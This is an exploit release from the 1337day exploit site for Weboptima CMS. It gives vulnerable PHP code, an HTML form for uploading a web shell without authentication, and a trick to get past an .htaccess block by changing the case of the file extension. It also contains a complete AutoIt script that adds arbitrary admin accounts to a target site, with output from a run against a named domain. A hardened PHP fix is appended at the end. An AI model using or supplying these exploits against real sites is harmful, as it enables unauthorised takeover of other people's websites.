`#cs
1337day.com >> Exploit database separated by exploit type (local, remote, DoS, etc.)
[+] Site : 1337day.com
[+] Support e-mail : submit[at]1337day.com
I'm AkaStep member from Inj3ct0r Team
weboptima_cms_remote_add_admin_shell_upload.au3
============================================
Vulnerable Software: Weboptima CMS
Vendor: http://weboptima.am/
Vulns: REMOTE SHELL UPLOAD AND REMOTE ARBITRARY ADD ADMIN.
Both exploits are available: an HTML exploit to upload a shell
and an AutoIt exploit to add arbitrary admin accounts to the target site.
More details below.
============================================
Few DEMOS:
============================================
About Vulns:
1'ST vulnerability is REMOTE SHELL UPLOAD:
Any *UNAUTHENTICATED* USER CAN UPLOAD SHELL.
Vulnerable code:
//cms/upload.php
=============SNIP BEGINS======================
<?php
$path="../uploades";
if(!file_exists($path))
{
mkdir($path, 0777);
}
if(isset($_GET['name']))
{
unlink($path."/".$_GET['name']);
$letter = $_GET['letter'];
$selTypey = $_GET['selType'];
header("Location: upload.php?letter=$letter&selType=$selTypey");
}
?>
<?php include_once("start.php"); ?>
<div align="center">
<table align="center">
<tr>
<td colspan="3" align="center"><span class="title">Կցված ֆայլեր</span></td>
</tr>
<tr>
<td>
<?php
if(isset($_POST['sub']))
{
$fileName = $_FILES["up_file"]['name'];
$masSimbl = array('&','%','#');
if(in_array($fileName[0], $masSimbl))
{
echo $fileName[0].' սիմվոլով սկսվող անուն չընտրել';
}
else
{
move_uploaded_file($_FILES["up_file"]['tmp_name'],"$path/".$_FILES["up_file"]['name']);
}
}
?>
========================SNIP ENDS=================
Simple HTML exploit to upload your shell:
<form method="post" action="http://CHANGE_TO_TARGET/cms/upload.php" enctype="multipart/form-data">
<input type="file" name="up_file" /> <input type="submit" class="button" name="sub" value="send"></form>
After a successful upload, the shell can be found at: http://site.tld/uploades/shellname.php
NOTE: There may be a simple .htaccess rule that blocks access to the shell (HTTP 403).
This is not a problem; just upload the shell with a name like:
myshell.PhP
or
myshell.pHp
OWNED.
2'nd vulnerability is: REMOTE ADD ADMIN
Any *UNAUTHENTICATED* USER CAN ADD ARBITRARY ADMIN ACCOUNT(s) TO TARGET SITE.
Vulnerable Code:
//cms/loginPass.php
Notice: header() without exit; *the script continues its execution.*
==================SNIP BEGINS=========
<?php
session_start();
if($_SESSION['status_shoping_adm']!="adm_shop") {
header("Location: index.php");
}
require_once('../myClass/DatabaseManeger.php');
require_once("../myClass/function.php");
$_POST = stripSlash($_POST);
$_GET = stripSlash($_GET);
?>
<?php
$error = "";
//And more stuff
==================SNIP ENDS=============
Here is an exploit written in AutoIt that uses
this vulnerability to add an admin to the target site.
Exploit usage(CLI):
weboptima.exe http://decart.am AzerbaijanBlackHatzWasHere AzerbaijanBlackHatzWasHere
##############################################################
Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8)
Usage: weboptima.exe http://site.tld username password
[*] DON'T HATE THE HACKER, HATE YOUR OWN CODE! [*]
[@@@] Vuln & Exploit By AkaStep [@@@]
##############################################################
[+] GETTING INFO ABOUT CMS [+]
[*] GOT Response : Yes! It is exactly that we are looking for! [*]
##################################################
Trying to add new admin:
To Site:www.decart.am
With Username: AzerbaijanBlackHatzWasHere
With Password: AzerbaijanBlackHatzWasHere
##################################################
##################################################
Exploit Try Count:1
##################################################
Error Count:0
##################################################
##################################################
Exploit Try Count:2
##################################################
Error Count:0
##################################################
Count of errors during exploitation : 0
##################################################
[*] Yaaaaa We are Going To Travel xD [*]
Try to login @
Site: decart.am/cms/index.php
With Username: AzerbaijanBlackHatzWasHere
With Password: AzerbaijanBlackHatzWasHere
*NOTE* Make Sure Your Browser Reveals HTTP REFERER!
OTHERWISE YOU WILL UNABLE TO LOGIN!
##################################################
[*] Exit [*]
##################################################
#ce
#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#NoTrayIcon
#include "WinHttp.au3"
#include <inet.au3>
#include <String.au3>
$exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _
'Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8) ' & @CRLF & _
'Usage: ' & @ScriptName & ' http://site.tld ' & ' username ' & 'password ' & _
@CRLF & "[*] DON'T HATE THE HACKER, HATE YOUR OWN CODE! [*]" & @CRLF & _
'[@@@] Vuln & Exploit By AkaStep [@@@]' & @CRLF & _StringRepeat('#',62);
ConsoleWrite(@CRLF & $exploitname & @CRLF)
$method='POST';
$vulnurl='cms/loginPass.php?test=' & Random(1,15677415,1);
Global $count=0,$error=0;
$cmsindent='kcaptcha'; # We will use it to identify CMS #;
$adminpanel='/cms/index.php';
;#~ Impersonate that We Are Not BOT or exploit.We are human who uses IE. Dohhh))# ~;
$useragent='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';
$msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://site.tld ' & ' usernametoadd ' & 'passwordtoadd' & @CRLF
if $CmdLine[0] <> 3 Then
MsgBox(64,"",$msg_usage);
ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
exit;
EndIf
if $CmdLine[0]=3 Then
$targetsite=$CmdLine[1];
$username=$CmdLine[2];
$password=$CmdLine[3];
EndIf
if StringStripWS($targetsite,8)='' OR StringStripWS($username,8)='' OR StringStripWS($password,8)='' Then
ConsoleWrite('Are you kidding me?');
Exit;
EndIf
HttpSetUserAgent($useragent)
$doublecheck=InetGet($targetsite,'',1);
if @error Then
ConsoleWrite('[*] Are you sure that site exist? Theris an error! Please Try again! [*]' & @CRLF)
Exit;
EndIf
ConsoleWrite('[+] GETTING INFO ABOUT CMS [+] ' & @CRLF);
sleep(Random(1200,2500,1));
HttpSetUserAgent($useragent);
$sidentify=_INetGetSource($targetsite & $adminpanel,True);
if StringInStr($sidentify,$cmsindent) Then
ConsoleWrite("[*] GOT Response : Yes! It is exactly that we are looking for! [*]" & @CRLF)
Else
ConsoleWrite("[*] IDENTIFICATION RESULT IS WRONG!. Anyway,forcing to try exploit it. [*]" & @CRLF)
$error+=1;
EndIf
$targetsite='www.' & StringReplace(StringReplace($targetsite,'http://',''),'/','')
priv8($targetsite,$username,$password,$count,$error);#~ do the magic for me plizzz));~#
Func priv8($targetsite,$username,$password,$count,$error)
$count+=1;~ #~ We are not going to exploit in infinitive manner xD #~;
Global $sAddress = $targetsite
$triptrop=@CRLF & _StringRepeat('#',50) & @CRLF;
$whatcurrentlywedo=$triptrop & 'Trying to add new admin: ' & @CRLF & 'To Site:' & $targetsite & @CRLF & 'With Username: ' & _
$username & @CRLF & 'With Password: ' & $password & $triptrop;
if $count <=1 then ConsoleWrite($whatcurrentlywedo)
$doitnicely=$triptrop & 'Exploit Try Count:' & $count & $triptrop & 'Error Count:' & $error & $triptrop;
ConsoleWrite($doitnicely);
Global $sPostData = "login=" & $username & "&password=" & $password & "&status=1" & "&add_sub=Add+New";
if $error>=2 OR $count>=2 Then
ConsoleWrite('Count of errors during exploitation : ' & $error & @CRLF)
if int($error)=0 then
ConsoleWrite($triptrop & '[*] Yaaaaa We are Going To Travel xD [*]' & _
@CRLF & 'Try to login @ ' & @CRLF & _
'Site: ' & $targetsite & $adminpanel & @CRLF &'With Username: ' & _
$username & @CRLF & 'With Password: ' & $password & @CRLF & _
'*NOTE* Make Sure Your Browser Reveals HTTP REFERER!' & @CRLF & _
' OTHERWISE YOU WILL UNABLE TO LOGIN! ' & $triptrop & '[*] Exit [*]' & $triptrop);
exit;
Else
ConsoleWrite($triptrop & '[*] Seems Is not exploitable or Vuln Fixed? [*]' & @CRLF & _
'[*] Anyway,try to login with new credentials. [*]' & @CRLF & _
'[*] May be you are Lucky;) [*]' & _
@CRLF & 'Try to login @ ' & @CRLF & _
'Site: ' & $targetsite & $adminpanel & @CRLF & _
'With Username: ' & $username & @CRLF & 'With Password: ' & $password & $triptrop & '[*] Exit [*]' & $triptrop);
EndIf
exit;
EndIf
Global $hOpen = _WinHttpOpen($useragent);
Global $hConnect = _WinHttpConnect($hOpen, $sAddress)
Global $hRequest = _WinHttpOpenRequest($hConnect,$method,$vulnurl,Default,Default,'');
_WinHttpAddRequestHeaders($hRequest, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8")
_WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-US,en;q=0.5")
_WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate")
_WinHttpAddRequestHeaders($hRequest, "DNT: 1")
_WinHttpAddRequestHeaders($hRequest, "Referer: " & $targetsite & $vulnurl);# We need it #;
_WinHttpAddRequestHeaders($hRequest, "Cookie: ComeToPwnYou");#~ Not neccessary just for compatibility.Change or "rm" it if you want. #~;
_WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive")
_WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded")
_WinHttpAddRequestHeaders($hRequest, "Content-Length: " & StringLen($sPostData));
_WinHttpSendRequest($hRequest, -1, $sPostData)
_WinHttpReceiveResponse($hRequest)
Global $sHeader, $sReturned
If _WinHttpQueryDataAvailable($hRequest) Then
$sHeader = _WinHttpQueryHeaders($hRequest)
Do
$sReturned &= _WinHttpReadData($hRequest)
Until @error
_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)
$targetsite=StringMid($targetsite,5,StringLen($targetsite))
Sleep(Random(10000,20000,1));
priv8($targetsite,$username,$password,$count,$error);#~ Pass to function and TRY to Exploit #~;
Else
$error+=1;#~ iNCREMENT ERROR(s) COUNT. CUZ SOMETHING WENT WRONG ~#;
_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)
$targetsite=StringMid($targetsite,5,StringLen($targetsite))
Sleep(Random(10000,20000,1));
priv8($targetsite,$username,$password,$count,$error);#~double check anyway.;~#
EndIf
EndFunc;=> priv8();
#cs
================================================
KUDOSSSSSSS
================================================
to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers
Also special thanks to: ottoman38 & HERO_AZE
================================================
/AkaStep
#ce
`
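
A hardened sketch of the two PHP handlers quoted in the advisory above, as an added example that is not part of the original advisory or the vendor's code: the access check terminates the request after redirecting, and the upload path allow-lists extensions case-insensitively instead of trusting the client's file name. The session key and the `uploades` directory come from the page; the function names, the allowed-extension list, the random file naming and the POST `delete` parameter are assumptions.

```php
<?php
// Added example: hardened sketch, not Weboptima's code. The session key and
// the "uploades" directory are from the page; everything else is assumed.
declare(strict_types=1);
session_start();

// loginPass.php fix: a Location header does not stop the script, so the
// guard has to end the request itself.
function require_admin(): void {
    if (($_SESSION['status_shoping_adm'] ?? '') !== 'adm_shop') {
        header('Location: index.php');
        exit;
    }
}

// upload.php fix: allow-list the extension after lowercasing it (so "PhP"
// and "pHp" are judged as "php") and never reuse the client-supplied name.
function safe_upload_name(string $clientName): ?string {
    $allowed = ['jpg', 'jpeg', 'png', 'gif', 'pdf']; // assumed policy
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return in_array($ext, $allowed, true) ? bin2hex(random_bytes(16)) . '.' . $ext : null;
}

// Delete fix: resolve the requested name and confirm the result is still
// inside the upload directory before calling unlink().
function resolve_inside(string $dir, string $name): ?string {
    $base = realpath($dir);
    $target = realpath($dir . '/' . basename($name));
    if ($base === false || $target === false) return null;
    return strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0 ? $target : null;
}

require_admin();                    // first statement: covers upload and delete
$path = __DIR__ . '/../uploades';

if (isset($_POST['delete'])) {      // assumed: deletion moved from GET to POST
    $target = resolve_inside($path, (string) $_POST['delete']);
    if ($target !== null) unlink($target);
}
if (isset($_POST['sub'], $_FILES['up_file'])) {
    $name = safe_upload_name($_FILES['up_file']['name']);
    if ($name === null || $_FILES['up_file']['error'] !== UPLOAD_ERR_OK) {
        http_response_code(400);
        exit('File type not allowed');
    }
    move_uploaded_file($_FILES['up_file']['tmp_name'], "$path/$name");
}
```

Because the .htaccess rule described in the advisory matched the extension case-sensitively, the upload directory should also be served with script execution disabled rather than relying on a name filter alone.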